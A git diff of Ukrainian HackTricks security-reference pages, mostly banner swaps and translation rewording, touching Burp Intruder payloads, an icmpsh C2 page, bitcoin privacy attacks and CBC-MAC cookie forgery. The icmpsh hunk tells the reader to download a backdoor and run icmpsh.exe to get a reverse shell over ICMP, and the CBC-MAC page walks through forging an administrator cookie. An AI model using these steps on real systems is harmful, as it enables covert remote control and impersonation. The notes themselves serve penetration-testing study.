+{% endhint %} # Базові Payloads -* **Простий список:** Просто список, що містить запис на кожному рядку -* **Файл виконання:** Список, який читається під час виконання (не завантажується в пам'ять). Для підтримки великих списків. -* **Зміна регістру:** Застосувати деякі зміни до списку рядків (без змін, до нижнього регістру, до ВЕРХНЬОГО регістру, до Правильного імені - перший символ з великої літери, решта до нижнього -, до Правильного імені - перший символ з великої літери, решта залишається таким самим -. +* **Простий список:** Просто список, що містить запис у кожному рядку. +* **Файл виконання:** Список, який читається в час виконання (не завантажується в пам'ять). Для підтримки великих списків. +* **Зміна регістру:** Застосувати деякі зміни до списку рядків (без змін, до нижнього, до ВЕРХНЬОГО, до Правильного імені - перший символ з великої літери, решта до нижнього -, до Правильного імені - перший символ з великої літери, решта залишається таким самим -. * **Числа:** Генерувати числа від X до Y з кроком Z або випадково. * **Брутфорсер:** Набір символів, мінімальна та максимальна довжина. @@ -26,18 +27,3 @@ {% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %} [https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator) - - -
- -Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! - -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами в **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. - -
diff --git a/c2/icmpsh.md b/c2/icmpsh.md index 743f35743..b3d8100b9 100644 --- a/c2/icmpsh.md +++ b/c2/icmpsh.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} Завантажте backdoor з: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) @@ -19,7 +20,7 @@ Виконайте скрипт: **run.sh** -**Якщо ви отримуєте якусь помилку, спробуйте змінити рядки:** +**Якщо ви отримуєте помилку, спробуйте змінити рядки:** ```bash IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1) IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }') @@ -35,16 +36,17 @@ read IP ```bash icmpsh.exe -t -d 500 -b 30 -s 128 ``` +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/crypto-and-stego/blockchain-and-crypto-currencies.md b/crypto-and-stego/blockchain-and-crypto-currencies.md index 2897284ce..db461c617 100644 --- a/crypto-and-stego/blockchain-and-crypto-currencies.md +++ b/crypto-and-stego/blockchain-and-crypto-currencies.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ## Основні концепції @@ -18,7 +19,7 @@ - **Смарт-контракти** визначаються як програми, які виконуються на блокчейні при виконанні певних умов, автоматизуючи виконання угод без посередників. - **Децентралізовані додатки (dApps)** базуються на смарт-контрактах, маючи зручний для користувача фронтенд та прозорий, перевіряємий бекенд. - **Токени та монети** різняться тим, що монети служать як цифрові гроші, тоді як токени представляють вартість або власність у конкретних контекстах. -- **Утилітарні токени** надають доступ до послуг, а **Безпечні токени** позначають власність активів. +- **Утилітарні токени** надають доступ до послуг, а **Токени безпеки** позначають власність активів. - **DeFi** означає Децентралізовану Фінансову систему, що пропонує фінансові послуги без центральних органів. - **DEX** та **DAOs** посилаються на Децентралізовані платформи обміну та Децентралізовані автономні організації відповідно. @@ -32,42 +33,42 @@ ### Транзакції -Транзакції Bitcoin включають переказ коштів між адресами. Транзакції перевіряються за допомогою цифрових підписів, забезпечуючи, що тільки власник приватного ключа може ініціювати перекази. +Транзакції Bitcoin включають переказ коштів між адресами. Транзакції перевіряються за допомогою цифрових підписів, забезпечуючи, що лише власник приватного ключа може ініціювати перекази. #### Ключові компоненти: -- **Мультипідписні транзакції** вимагають декілька підписів для авторизації транзакції. -- Транзакції складаються з **входів** (джерело коштів), **виходів** (призначення), **комісії** (сплачується майнерам) та **скриптів** (правила транзакції). +- **Транзакції з багатьма підписами** вимагають декількох підписів для авторизації транзакції. +- Транзакції складаються з **входів** (джерело коштів), **виходів** (призначення), **комісії** (сплачено гірникам) та **скриптів** (правила транзакції). ### Мережа Lightning -Мета полягає в покращенні масштабованості Bitcoin, дозволяючи кілька транзакцій у межах каналу, транслюючи лише кінцевий стан на блокчейн. +Мета полягає в покращенні масштабованості Bitcoin, дозволяючи кілька транзакцій у межах каналу, тільки транслюючи остаточний стан на блокчейн. ## Проблеми приватності Bitcoin -Атаки на приватність, такі як **Спільна власність входів** та **Виявлення адрес зміни UTXO**, використовують шаблони транзакцій. Стратегії, такі як **Міксери** та **CoinJoin**, покращують анонімність, затемнюючи зв'язки транзакцій між користувачами. +Атаки на приватність, такі як **Спільна власність входу** та **Виявлення адреси зміни UTXO**, використовують шаблони транзакцій. Стратегії, такі як **Міксери** та **CoinJoin**, покращують анонімність, приховуючи зв'язки транзакцій між користувачами. ## Анонімне отримання Bitcoin -Методи включають готівкові угоди, майнінг та використання міксерів. **CoinJoin** змішує кілька транзакцій для ускладнення відстежуваності, тоді як **PayJoin** маскує CoinJoin як звичайні транзакції для підвищення приватності. +Методи включають готівкові угоди, майнінг та використання міксерів. **CoinJoin** змішує декілька транзакцій для ускладнення відстежуваності, тоді як **PayJoin** маскує CoinJoin як звичайні транзакції для підвищення приватності. # Атаки на приватність Bitcoin -# Підсумок атак на приватність Bitcoin +# Огляд атак на приватність Bitcoin -У світі Bitcoin приватність транзакцій та анонімність користувачів часто є предметами занепокоєнь. Ось спрощений огляд кількох загальних методів, за допомогою яких атакувальники можуть порушити приватність Bitcoin. +У світі Bitcoin приватність транзакцій та анонімність користувачів часто є предметом обурення. Ось спрощений огляд кількох загальних методів, за допомогою яких атакувальники можуть порушити приватність Bitcoin. -## **Припущення про спільну власність входів** +## **Припущення про спільну власність входу** -Зазвичай рідко комбінуються входи від різних користувачів в одній транзакції через складність. Таким чином, **два вхідні адреси в одній транзакції часто вважаються належними одному власнику**. +Зазвичай рідко відбувається комбінування входів від різних користувачів в одній транзакції через складність процесу. Таким чином, **два вхідні адреси в одній транзакції часто вважаються належними одному власнику**. -## **Виявлення адрес зміни UTXO** +## **Виявлення адреси зміни UTXO** UTXO, або **Невитрачений вихід транзакції**, повинен бути повністю витрачений у транзакції. Якщо лише частина нього відправляється на іншу адресу, залишок йде на нову адресу зміни. Спостерігачі можуть припустити, що ця нова адреса належить відправнику, порушуючи приватність. ### Приклад -Для пом'якшення цього, служби змішування або використання кількох адрес можуть допомогти затемнити власність. +Для пом'якшення цього, служби змішування або використання декількох адрес можуть допомогти приховати власність. ## **Викладення в соціальних мережах та форумах** @@ -77,51 +78,49 @@ UTXO, або **Невитрачений вихід транзакції**, по Транзакції можуть бути візуалізовані у вигляді графіків, розкриваючи потенційні зв'язки між користувачами на основі потоку коштів. -## **Неоптимальний евристичний вхід (Оптимальний евристичний зміни)** +## **Евристика зайвого входу (Оптимальна евристика зміни)** -Цей евристичний заснований на аналізі транзакцій з кількома входами та виходами для вгадування, який вихід є зміною, що повертається відправнику. +Ця евристика базується на аналізі транзакцій з декількома входами та виходами для вгадування, який вихід є зміною, що повертається відправнику. ### Приклад ```bash 2 btc --> 4 btc 3 btc 1 btc ``` -Якщо додавання додаткових входів робить зміну виходу більшою, ніж будь-який окремий вхід, це може заплутати евристичний аналіз. - -## **Примусове Повторне Використання Адреси** +## **Примусове Повторне Використання Адрес** Атакувальники можуть надсилати невеликі суми на раніше використані адреси, сподіваючись, що отримувач поєднає їх з іншими входами у майбутніх транзакціях, тим самим пов'язуючи адреси між собою. ### Правильна Поведінка Гаманця -Гаманці повинні уникати використання монет, отриманих на вже використаних, порожніх адресах, щоб уникнути цього витоку конфіденційності. +Гаманці повинні уникати використання монет, отриманих на вже використаних, порожніх адресах, щоб уникнути цієї витоку приватності. ## **Інші Техніки Аналізу Блокчейну** - **Точні Суми Платежів:** Транзакції без здачі ймовірно здійснюються між двома адресами, що належать одному користувачеві. - **Круглі Числа:** Кругле число в транзакції вказує на платіж, а некруглий вихід ймовірно є здачею. - **Відбиток Гаманця:** Різні гаманці мають унікальні шаблони створення транзакцій, що дозволяє аналітикам ідентифікувати використане програмне забезпечення та, можливо, адресу здачі. -- **Кореляція Суми та Часу:** Розкриття часів або сум може зробити транзакції відстежуваними. +- **Кореляція Суми та Часу:** Розголошення часу або сум може зробити транзакції відстежуваними. ## **Аналіз Трафіку** -Моніторинг мережевого трафіку дозволяє атакувальникам потенційно пов'язувати транзакції або блоки з IP-адресами, порушуючи конфіденційність користувача. Це особливо справджується, якщо суб'єкт працює з багатьма вузлами Bitcoin, підвищуючи їх здатність до моніторингу транзакцій. +Моніторинг мережевого трафіку дозволяє атакувальникам потенційно пов'язувати транзакції або блоки з IP-адресами, порушуючи приватність користувача. Це особливо справджується, якщо суб'єкт працює з багатьма вузлами Bitcoin, підвищуючи їх здатність моніторити транзакції. ## Додатково -Для повного списку атак на конфіденційність та захисту відвідайте [Конфіденційність Bitcoin на Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). +Для повного списку атак на приватність та захисту відвідайте [Про Приватність Bitcoin на Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). # Анонімні Транзакції Bitcoin ## Способи Отримання Біткоїнів Анонімно -- **Готівкові Транзакції**: Отримання біткоїнів через готівку. +- **Готівкові Транзакції**: Отримання біткоїнів за допомогою готівки. - **Альтернативи Готівки**: Придбання подарункових карток та їх обмін онлайн на біткоїни. -- **Майнінг**: Найбільш приватний спосіб заробити біткоїни - це майнінг, особливо коли він виконується самостійно, оскільки пули для майнінгу можуть знати IP-адресу майнера. [Інформація про Пули для Майнінгу](https://en.bitcoin.it/wiki/Pooled_mining) +- **Майнінг**: Найбільш приватний спосіб заробляти біткоїни - це майнінг, особливо коли робиться самостійно, оскільки пули для майнінгу можуть знати IP-адресу майнера. [Інформація про Пули для Майнінгу](https://en.bitcoin.it/wiki/Pooled_mining) - **Крадіжка**: Теоретично, крадіжка біткоїнів може бути ще одним способом отримання їх анонімно, хоча це незаконно та не рекомендується. ## Сервіси Змішування -Використовуючи сервіс змішування, користувач може **надсилати біткоїни** та отримувати **інші біткоїни в обмін**, що ускладнює відстеження оригінального власника. Однак це вимагає довіри до сервісу щодо відсутності журналів та фактичного повернення біткоїнів. Альтернативні варіанти змішування включають Bitcoin казино. +Використовуючи сервіс змішування, користувач може **надсилати біткоїни** та отримувати **інші біткоїни в обмін**, що ускладнює відстеження оригінального власника. Однак це потребує довіри до сервісу не зберігати журнали та фактично повертати біткоїни. Альтернативні варіанти змішування включають Bitcoin казино. ## CoinJoin @@ -133,16 +132,16 @@ UTXO, або **Невитрачений вихід транзакції**, по ## PayJoin -Варіант CoinJoin, **PayJoin** (або P2EP), маскує транзакцію між двома сторонами (наприклад, клієнтом та продавцем) як звичайну транзакцію, без характерних рівних виходів, що є характерним для CoinJoin. Це робить його надзвичайно важким для виявлення та може скасувати евристичний аналіз спільної власності входів, який використовують сутності моніторингу транзакцій. +Варіант CoinJoin, **PayJoin** (або P2EP), маскує транзакцію між двома сторонами (наприклад, клієнтом та продавцем) як звичайну транзакцію, без характерних рівних виходів, що є характерним для CoinJoin. Це робить важко виявити та може скасувати евристичний метод власності спільного входу, який використовують сутності спостереження за транзакціями. ```plaintext 2 btc --> 3 btc 5 btc 4 btc ``` -Транзакції, подібні до вищезазначених, можуть бути PayJoin, підвищуючи конфіденційність, залишаючись нерозрізненними від стандартних транзакцій біткоїн. +Транзакції, подібні до вищезазначених, можуть бути PayJoin, підвищуючи конфіденційність, залишаючись нерозрізненними від стандартних транзакцій біткоїну. -**Використання PayJoin може значно нарушити традиційні методи спостереження**, що робить його перспективним розвитком у забезпеченні конфіденційності транзакцій. +**Використання PayJoin може значно нарушити традиційні методи спостереження**, що робить його перспективним розвитком у зусиллях забезпечення конфіденційності транзакцій. -# Найкращі практики з конфіденційності в криптовалютах +# Найкращі практики конфіденційності в криптовалютах ## **Техніки синхронізації гаманців** @@ -153,7 +152,7 @@ UTXO, або **Невитрачений вихід транзакції**, по ## **Використання Tor для анонімності** -Оскільки Bitcoin працює на мережі пір-у-пір, рекомендується використання Tor для маскування вашої IP-адреси, підвищуючи конфіденційність при взаємодії з мережею. +Оскільки Bitcoin працює в мережі пір-у-пір, рекомендується використовувати Tor для маскування вашої IP-адреси, підвищуючи конфіденційність при взаємодії з мережею. ## **Запобігання повторному використанню адрес** @@ -162,10 +161,10 @@ UTXO, або **Невитрачений вихід транзакції**, по ## **Стратегії для конфіденційності транзакцій** - **Декілька транзакцій**: Розбиття платежу на кілька транзакцій може затемнити суму транзакції, ускладнюючи атаки на конфіденційність. -- **Уникання здачі**: Вибір транзакцій, які не потребують виходів здачі, підвищує конфіденційність, заважаючи методам виявлення здачі. +- **Уникання здачі**: Вибір транзакцій, які не потребують видачі здачі, підвищує конфіденційність, заважаючи методам виявлення здачі. - **Декілька виходів здачі**: Якщо уникнути здачі неможливо, генерація декількох виходів здачі все ще може покращити конфіденційність. -# **Monero: Стягнення анонімності** +# **Monero: Стандарт анонімності** Monero відповідає потребі в абсолютній анонімності в цифрових транзакціях, встановлюючи високі стандарти конфіденційності. @@ -173,10 +172,10 @@ Monero відповідає потребі в абсолютній анонім ## **Розуміння Газу** -Газ вимірює обчислювальні зусилля, необхідні для виконання операцій на Ethereum, ціновою величиною в **gwei**. Наприклад, транзакція, яка коштує 2 310 000 gwei (або 0,00231 ETH), включає обмеження газу та базову комісію, з чайовим для стимулювання майнерів. Користувачі можуть встановити максимальну комісію, щоб не переплачувати, з надлишком, який буде повернуто. +Газ вимірює обчислювальні зусилля, необхідні для виконання операцій в Ethereum, вимірюється в **gwei**. Наприклад, транзакція, вартістю 2,310,000 gwei (або 0.00231 ETH), включає ліміт газу та базову комісію, з чайовим для стимулювання майнерів. Користувачі можуть встановити максимальну комісію, щоб уникнути переплати, зайве буде повернуто. ## **Виконання Транзакцій** -Транзакції в Ethereum включають відправника та отримувача, які можуть бути адресами користувача або смарт-контрактами. Вони потребують комісії та повинні бути добиті. Основна інформація в транзакції включає отримувача, підпис відправника, значення, необов'язкові дані, обмеження газу та комісії. Зокрема, адреса відправника виводиться з підпису, що усуває необхідність у ньому в даних транзакції. +Транзакції в Ethereum включають відправника та отримувача, які можуть бути адресами користувачів або смарт-контрактів. Вони потребують комісію та повинні бути добиті. Основна інформація в транзакції включає отримувача, підпис відправника, значення, необов'язкові дані, ліміт газу та комісії. Зокрема, адреса відправника виводиться з підпису, що усуває необхідність у ньому в даних транзакції. -Ці практики та механізми є основою для кожного, хто бажає працювати з криптовалютами, надаючи перевагу конфіденційності та безпеці. +Ці практики та механізми є основою для всіх, хто бажає працювати з криптовалютами, надаючи перевагу конфіденційності та безпеці. diff --git a/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md b/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md index 47c10bb24..952e1b407 100644 --- a/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md +++ b/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами в **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} # CBC @@ -19,7 +20,7 @@ # CBC-MAC -**Код аутентифікації повідомлення з шифруванням блоків за допомогою ланцюга блоків** (**CBC-MAC**) - це метод, що використовується в криптографії. Він працює шляхом шифрування повідомлення блок за блоком, де шифрування кожного блоку пов'язане з попереднім. Цей процес створює **ланцюжок блоків**, забезпечуючи, що зміна навіть одного біта в оригінальному повідомленні призведе до непередбачуваної зміни в останньому блоку зашифрованих даних. Для внесення або скасування такої зміни потрібний ключ шифрування, що забезпечує безпеку. +**Шифрувальний код аутентифікації повідомлень з ланцюжком блоків** (**CBC-MAC**) - це метод, що використовується в криптографії. Він працює шляхом шифрування повідомлення блок за блоком, де шифрування кожного блоку пов'язане з попереднім. Цей процес створює **ланцюжок блоків**, який гарантує, що зміна навіть одного біта в оригінальному повідомленні призведе до непередбачуваної зміни в останньому блоку зашифрованих даних. Для внесення або скасування такої зміни потрібний ключ шифрування, що забезпечує безпеку. Для обчислення CBC-MAC повідомлення m, його шифрують в режимі CBC з нульовим вектором ініціалізації та зберігають останній блок. Наступна фігура наводить обчислення CBC-MAC повідомлення, що складається з блоків![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) за допомогою секретного ключа k та блочного шифру E: @@ -27,8 +28,8 @@ # Вразливість -З CBC-MAC зазвичай використовується **IV рівний 0**.\ -Це проблема, оскільки 2 відомі повідомлення (`m1` та `m2`) незалежно генерують 2 підписи (`s1` та `s2`). Таким чином: +Зазвичай з CBC-MAC використовується **IV рівний 0**.\ +Це проблема, оскільки 2 відомі повідомлення (`m1` та `m2`) незалежно генеруватимуть 2 підписи (`s1` та `s2`). Отже: * `E(m1 XOR 0) = s1` * `E(m2 XOR 0) = s2` @@ -40,25 +41,25 @@ **Це можливо обчислити без знання ключа шифрування.** -Уявіть, що ви шифруєте ім'я **Адміністратор** у блоках **8 байтів**: +Уявіть, що ви шифруєте ім'я **Адміністратор** у блоках по **8 байт**: * `Administ` * `rator\00\00\00` Ви можете створити ім'я користувача **Administ** (m1) та отримати підпис (s1).\ -Потім ви можете створити ім'я користувача, яке дорівнює результату `rator\00\00\00 XOR s1`. Це згенерує `E(m2 XOR s1 XOR 0)`, яке є s32.\ -Тепер ви можете використовувати s32 як підпис повного імені **Адміністратор**. +Потім ви можете створити ім'я користувача, яке є результатом `rator\00\00\00 XOR s1`. Це згенерує `E(m2 XOR s1 XOR 0)`, яке є s32.\ +тепер ви можете використовувати s32 як підпис повного імені **Адміністратор**. ### Резюме -1. Отримайте підпис імені користувача **Administ** (m1), який дорівнює s1 -2. Отримайте підпис імені користувача **rator\x00\x00\x00 XOR s1 XOR 0**, який дорівнює s32**.** +1. Отримайте підпис імені користувача **Administ** (m1), який є s1 +2. Отримайте підпис імені користувача **rator\x00\x00\x00 XOR s1 XOR 0**, який є s32**.** 3. Встановіть cookie на s32 і він буде дійсним cookie для користувача **Адміністратор**. # Керування атакою IV Якщо ви можете контролювати використаний IV, атака може бути дуже простою.\ -Якщо cookie - це просто зашифроване ім'я користувача, для видачі себе за користувача "**адміністратор**" ви можете створити користувача "**Адміністратор**" і отримати його cookie.\ +Якщо cookie - це просто зашифроване ім'я користувача, для видачі себе за користувача "**адміністратор**" ви можете створити користувача "**Адміністратор**" і отримаєте його cookie.\ Тепер, якщо ви можете контролювати IV, ви можете змінити перший байт IV так, що **IV\[0] XOR "A" == IV'\[0] XOR "a"** і згенерувати cookie для користувача **Адміністратор**. Цей cookie буде дійсним для **видачі себе** за користувача **адміністратор** з початковим **IV**. ## Посилання @@ -66,16 +67,17 @@ Додаткова інформація за посиланням [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами в **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/crypto-and-stego/crypto-ctfs-tricks.md b/crypto-and-stego/crypto-ctfs-tricks.md index dc7f1182e..155313c6f 100644 --- a/crypto-and-stego/crypto-ctfs-tricks.md +++ b/crypto-and-stego/crypto-ctfs-tricks.md @@ -1,18 +1,19 @@ # Хитрощі Crypto CTFs +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
